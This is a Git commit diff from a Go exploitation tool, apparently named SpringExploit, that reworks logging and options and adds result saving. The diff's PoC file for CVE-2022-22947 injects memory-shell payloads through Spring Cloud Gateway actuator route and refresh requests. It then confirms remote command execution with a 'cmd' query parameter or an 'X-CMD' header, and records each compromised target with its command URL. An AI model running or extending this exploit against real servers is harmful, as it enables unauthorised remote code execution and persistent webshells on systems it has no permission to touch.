保存结果和修复日志输出位置问题

Author: SummerSec

.gitignore

@@ -1,3 +1,8 @@
 .idea
 logs/**
+logs
 logs.txt
+**.exe
+**.zip
+**.tar.gz
+target.txt

cmd/commons/core/options.go

@@ -43,14 +43,14 @@ func (o Options) toString() interface{} {
 
 func ParseOptions() *Options {
 	options := &Options{}
-	flag.IntVar(&options.Mode, "m", 6, "debug mode off (debug mode = 6)")
+	flag.IntVar(&options.Mode, "m", 0, "debug mode off (debug mode = 1) default mode = 0")
 	flag.IntVar(&options.Thread, "t", 1, "threads number ")
-	flag.StringVar(&options.File, "f", "", "file to read example: -file=test.txt  http(s)://host:port/")
+	flag.StringVar(&options.File, "f", "", "file to read example: -file=test.txt  http(s)://host:port/ (notes: The last line must be empty)")
 	flag.StringVar(&options.Url, "u", "", "url to read example: -url=http://www.baidu.com:80")
 	flag.StringVar(&options.Proxy, "proxy", "", "proxy example: -proxy=http://127.0.0.1:8080 or -proxy=socks5://127.0.0.1:1080")
 	flag.BoolVar(&options.Version, "version", false, "show version")
 	flag.BoolVar(&options.Verbose, "verbose", false, "show verbose")
-	flag.StringVar(&options.LogFile, "log", "logs.txt", "log file example: -log=/logs/logs.txt")
+	flag.StringVar(&options.LogFile, "log", "", "log file example: -log=/logs/logs.txt")
 	flag.IntVar(&options.Retry, "retry", 3, "repeat request times")
 	//flag.StringVar(&options.IP, "i", "", "ip segment example: -ip=192.168.0.1/24 ")
 	flag.IntVar(&options.Timeout, "timeout", 10, "timeout")
@@ -83,7 +83,7 @@ func showVerbose(options *Options) {
 	if !options.Verbose {
 		switch options.Mode {
 		case 1:
-			log.SetLevel(log.PanicLevel)
+			log.SetLevel(log.DebugLevel)
 		case 2:
 			log.SetLevel(log.FatalLevel)
 		case 3:
@@ -93,7 +93,7 @@ func showVerbose(options *Options) {
 		case 5:
 			log.SetLevel(log.InfoLevel)
 		case 6:
-			log.SetLevel(log.DebugLevel)
+			log.SetLevel(log.PanicLevel)
 		case 7:
 			log.SetLevel(log.TraceLevel)
 		default:

cmd/commons/core/runner.go

@@ -55,6 +55,7 @@ func (r *Runner) Run() {
 				go Start(urls[i], hashmap, i, c) // Start 3 goroutines
 				i = <-c
 			} else {
+				i++
 				break
 			}
 		}
@@ -63,8 +64,6 @@ func (r *Runner) Run() {
 }
 
 func Start(u string, hashmap map[string]interface{}, i int, c chan int) {
-	log.Debugln("github/SummerSec/SpringExploit/cmd/commons/core/runner.go: Start")
-
 	log.Info("Runner started")
 	log.Infoln("testing URL: ", u)
 	//for k, v := range hashmap {

cmd/commons/poc/CVE-2022-22947.go

@@ -23,8 +23,8 @@ const memshell1 = "#{T(org.springframework.cglib.core.ReflectUtils).defineClass(
 
 type CVE202222947 struct{}
 
-func (CVE202222947) SendPoc(url string, hashmap map[string]interface{}) {
-	log.Debugf("github.com/SummerSec/SpringExploit/cmd/commons/poc/CVE202222947.SendPoc url:%s", url)
+func (p CVE202222947) SendPoc(target string, hashmap map[string]interface{}) {
+	log.Debugf("github.com/SummerSec/SpringExploit/cmd/commons/poc/CVE202222947.SendPoc url:%s", target)
 	//TODO implement me
 	NettyMemshell := fmt.Sprintf(memshell, mem)
 	SpringRequestMappingMemshell := fmt.Sprintf(memshell1, mem1)
@@ -33,7 +33,11 @@ func (CVE202222947) SendPoc(url string, hashmap map[string]interface{}) {
 	log.Debugf("[+] Running default poc")
 	reqinfo := NewReqInfo()
 	reqmap := structs.Map(reqinfo)
-	reqmap["url"] = url
+	// 解析target
+	//t, _ := url.Parse(target)
+	//target = t.Scheme + "://" + t.Host + "/"
+
+	reqmap["url"] = target
 	reqmap["method"] = "POST"
 	// 默认随机UA 不需要设置
 	reqmap["headers"] = map[string]string{
@@ -55,30 +59,30 @@ func (CVE202222947) SendPoc(url string, hashmap map[string]interface{}) {
 	for true {
 
 		// 第一次请求
-		t := url + "actuator/gateway/routes/" + id
+		t := target + "actuator/gateway/routes/" + id
 		reqmap["url"] = t
 		utils.Send(reqmap)
 		// 第二次请求
-		t = url + "actuator/gateway/refresh"
+		t = target + "actuator/gateway/refresh"
 		reqmap["url"] = t
 		reqmap["body"] = ""
 
 		utils.Send(reqmap)
 		// 第三次请求
-		t = url + "actuator/gateway/routes/" + id
+		t = target + "actuator/gateway/routes/" + id
 		reqmap["url"] = t
 		reqmap["method"] = "GET"
 		resp := utils.Send(reqmap)
 		// 第四次请求
 		reqmap["method"] = "DELETE"
 		utils.Send(reqmap)
 		// 第五次请求
-		t = url + "actuator/gateway/refresh"
+		t = target + "actuator/gateway/refresh"
 		reqmap["url"] = t
 		reqmap["method"] = "POST"
 		utils.Send(reqmap)
 
-		if checkExp(resp, url) {
+		if p.checkExp(resp, target, hashmap["Out"].(string)) {
 			log.Info("[+] Successful exploitation CVE-2020-222947")
 			break
 		} else {
@@ -96,30 +100,34 @@ func (CVE202222947) SendPoc(url string, hashmap map[string]interface{}) {
 
 func (CVE202222947) init() {
 	//TODO implement me
-
 	log.Debugf("CVE-2022-22947 init")
 
 }
 
-func checkExp(resp *req.Response, url string) bool {
+// 检查是否成功
+func (p CVE202222947) checkExp(resp *req.Response, url string, file string) bool {
 
 	log.Debugln("github.com/SpringExploit/cmd/commons/poc/CVE-2020-222947 checkExp")
-	res, _ := resp.ToString()
+	res := resp.Dump()
 	log.Debugf("[+] res:%s", res)
 	if strings.Contains(res, "route_id") {
-		url := url
 		re, _ := req.R().SetQueryString("cmd=echo route_id").SetHeader("X-CMD", "echo route_id").Send("GET", url)
-		res2, _ := re.ToString()
+		res2 := re.String()
 		log.Debugf("[+] res2:%s", res2)
 		if strings.Contains(res2, "route_id") {
-			log.Info("[+] Successful exploitation CVE-2020-222947")
 			log.Debugln("[+] Result: " + re.String())
-			log.Info("[*] 漏洞利用验证成功！")
+			log.Info("[+] Successful exploitation CVE-2020-222947")
 			log.Info("[*] 请手动验证是否漏洞利用成功！")
-			log.Info("[*]: url: " + url + "/?cmd=echo Result or add header X-CMD: echo Restult")
+			p.saveResult(url, file)
 			return true
 		}
 		return true
 	}
 	return false
 }
+
+func (CVE202222947) saveResult(target, file string) {
+	context := target + " Successful exploitation CVE-2020-222947 " + target + "/?cmd=echo Result or add header X-CMD: echo Result"
+	log.Info("[*]: url: " + target + "/?cmd=echo Result or add header X-CMD: echo Result")
+	utils.SaveToFile(context, file)
+}

cmd/commons/poc/DefaultPocS.go

@@ -1,7 +1,11 @@
 package poc
 
+import "github.com/imroc/req/v3"
+
 // PoC poc接口
 type PoC interface {
-	SendPoc(url string, hashmap map[string]interface{})
+	SendPoc(target string, hashmap map[string]interface{})
 	init()
+	saveResult(target string, file string)
+	checkExp(resp *req.Response, target string, file string) bool
 }

cmd/commons/poc/demo.go

@@ -3,6 +3,7 @@ package poc
 import (
 	"github.com/SummerSec/SpringExploit/cmd/commons/utils"
 	"github.com/fatih/structs"
+	"github.com/imroc/req/v3"
 	log "github.com/sirupsen/logrus"
 )
 
@@ -25,26 +26,48 @@ func (d Demo) SendPoc(target string, hashmap map[string]interface{}) {
 	//target = result.Scheme + "://" + result.Host + result.Port() + "/" + result.Path
 
 	reqmap["url"] = target
-	//for k, v := range hashmap {
-	//	log.Debugln("key: ", k, " value: ", v)
-	//}
 
+	// 请求方法
 	reqmap["method"] = "GET"
 	// 默认随机UA 不需要设置
 	reqmap["headers"] = map[string]string{
 		"User-Agent": utils.GetUA(),
 	}
+	// 请求body
 	reqmap["body"] = ""
+
+	// TODO 可以设置超时时间 重复次数 代理等 下面默认使用默认值
 	reqmap["timeout"] = hashmap["Timeout"].(int)
 	reqmap["retry"] = hashmap["Retry"].(int)
 	reqmap["proxy"] = hashmap["Proxy"].(string)
 	reqmap["mode"] = hashmap["Mode"].(int)
+	// 发送请求， 获取响应 resp := utils.Send(reqmap)
+
+	resp := utils.Send(reqmap)
+	log.Debugln("[+] resp: ", resp.Dump())
 
-	utils.Send(reqmap)
+	// TODO check exp
+	d.checkExp(resp, target, hashmap["Out"].(string))
+
+	// TODO 保存结果
+	d.saveResult(target, hashmap["Out"].(string))
 
 }
 
 func (d Demo) init() {
-	log.Info("[+] Registering Demo poc")
+	log.Debugln("[+] Registering Demo poc")
+
+}
+
+// SaveResult 保存结果
+func (d Demo) saveResult(target, file string) {
+	log.Debugf("[+] save result")
+	// TODO 保存结果
+	utils.SaveToFile(target, file)
+
+}
 
+func (d Demo) checkExp(resp *req.Response, target string, file string) bool {
+	log.Debugf("[+] check exp")
+	return false
 }

cmd/commons/utils/file.go

@@ -0,0 +1,14 @@
+package utils
+
+import "os"
+
+// Mkdir 创建文件夹
+func Mkdir(dir string) error {
+	if _, err := os.Stat(dir); os.IsNotExist(err) {
+		err := os.MkdirAll(dir, 0755)
+		if err != nil {
+			return err
+		}
+	}
+	return nil
+}

cmd/commons/utils/httpclient.go

@@ -9,10 +9,10 @@ import (
 func InIt(mode int, timeout int, proxy string, retry int) (client *req.Client) {
 	log.Info("init httpclient")
 	client = req.NewClient()
-	client.SetLogger(log.StandardLogger())
-	if mode != 0 {
-		client.DevMode()
+	if mode != 5 {
+		client.EnableDumpAll().EnableDebugLog()
 	}
+	client.SetLogger(log.StandardLogger())
 	// 设置超时时间
 	client.SetTimeout(time.Duration(timeout) * time.Second)
 	client.SetCommonRetryCount(retry)
@@ -41,17 +41,17 @@ func Send(hashmap map[string]interface{}) (resp *req.Response) {
 	headers := hashmap["headers"].(map[string]string)
 	body := hashmap["body"]
 
-	client := InIt(mode, timeout, proxy, retry).EnableDumpAll()
+	client := InIt(mode, timeout, proxy, retry)
 
-	req := client.R()
-	reqs := SetRequest(req, headers, body.(string))
+	reqt := client.R().EnableDump()
+	reqs := SetRequest(reqt, headers, body.(string))
 	resp, err := reqs.Send(method, url)
 	if err != nil {
 		log.Error("send request error:	" + err.Error())
 		return nil
 	}
 	log.Debugln("send request success")
-	res, _ := resp.ToString()
+	res := resp.Dump()
 	log.Debugln("response:	" + res)
 
 	return resp

cmd/commons/utils/readfile.go

@@ -3,8 +3,10 @@ package utils
 import (
 	"bufio"
 	log "github.com/sirupsen/logrus"
-	"net/url"
 	"os"
+	"os/exec"
+	"path/filepath"
+	"strings"
 )
 
 func ReadFile(path string) (urls []string, err error) {
@@ -15,18 +17,41 @@ func ReadFile(path string) (urls []string, err error) {
 			"Have you got acces to it?\n")
 		return nil, err
 	}
-	defer file.Close()
+	defer func(file *os.File) {
+		err := file.Close()
+		if err != nil {
+			log.Error("An error occurred on closing the inputfile\n" +
+				"Does the file exist?\n" +
+				"Have you got acces to it?\n")
+		}
+	}(file)
 	iReader := bufio.NewReader(file)
 	var lins []string
 	for {
 		str, err := iReader.ReadString('\n')
 		if err != nil {
 			return lins, err // error or EOF
 		}
-		url.Parse(str)
-
-		log.Infoln("The url is : %s", str)
+		str = str[:len(str)-2]
+		log.Infoln("The url is : ", str)
 		lins = append(lins, str)
 	}
 	return lins, nil
 }
+
+func getpath() string {
+	file, _ := exec.LookPath(os.Args[0])
+	path1, _ := filepath.Abs(file)
+	filename := filepath.Dir(path1)
+	var path string
+	if strings.Contains(filename, "/") {
+		tmp := strings.Split(filename, `/`)
+		tmp[len(tmp)-1] = ``
+		path = strings.Join(tmp, `/`)
+	} else if strings.Contains(filename, `\`) {
+		tmp := strings.Split(filename, `\`)
+		tmp[len(tmp)-1] = ``
+		path = strings.Join(tmp, `\`)
+	}
+	return path
+}